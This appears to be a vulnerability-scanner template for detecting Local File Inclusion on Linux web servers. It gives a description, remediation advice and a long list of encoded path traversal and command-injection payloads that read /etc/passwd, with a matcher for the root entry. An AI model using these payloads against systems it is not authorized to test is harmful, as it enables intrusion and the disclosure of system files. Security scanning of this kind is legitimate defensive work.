id: {{.Name}}

info:
  name: Local File Inclusion - Linux
  author: Wahyuhadi
  severity: high
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
  tags: lfi,dast,linux
  description: |
    Local File Inclusion (LFI) is a web security vulnerability that allows an attacker to include and execute files from the local server through user-controlled input. This can lead to unauthorized access to sensitive files, information disclosure, or even remote code execution (RCE) under certain conditions.
  metadata:
    tech: all
    severtity: high (7.5)
    cvss-3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-3.1-link: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  fixing: |
      - Use Whitelisting, Allow only specific, predefined files.
      - Block Directory Traversal,  Sanitize input to prevent ../ or null byte attacks.
      - Use Least Privilege,  Restrict file permissions and avoid running as root.
      - Monitor & Log Requests, Track suspicious activity and use a Web Application Firewall (WAF).


requests:
  - raw:
      - |
        {{ .Raw }}

    payloads:
      path:
        - 'file:///etc/passwd'
        - '/etc/passwd'
        - '../../etc/passwd'
        - '../../../etc/passwd'
        - '/../../../../etc/passwd'
        - '../../../../../../../../../etc/passwd'
        - '../../../../../../../../etc/passwd'
        - '../../../../../../../etc/passwd'
        - '../../../../../../etc/passwd'
        - '../../../../../etc/passwd'
        - '../../../../etc/passwd'
        - '../../../etc/passwd'
        - '../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd%00'
        - '../../../../../../../../../../../../etc/passwd'
        - '/../../../../../../../../../../etc/passwd^^'
        - '/../../../../../../../../../../etc/passwd'
        - '/./././././././././././etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '%252e%252e%252fetc%252fpasswd'
        - '%252e%252e%252fetc%252fpasswd%00'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
        - '....//....//etc/passwd'
        - '..///////..////..//////etc/passwd'
        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
        - '%0a/bin/cat%20/etc/passwd'
        - '%00/etc/passwd%00'
        - '%00../../../../../../etc/passwd'
        - '/../../../../../../../../../../../etc/passwd%00.jpg'
        - '/../../../../../../../../../../../etc/passwd%00.html'
        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '\\&apos;/bin/cat%20/etc/passwd\\&apos;'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'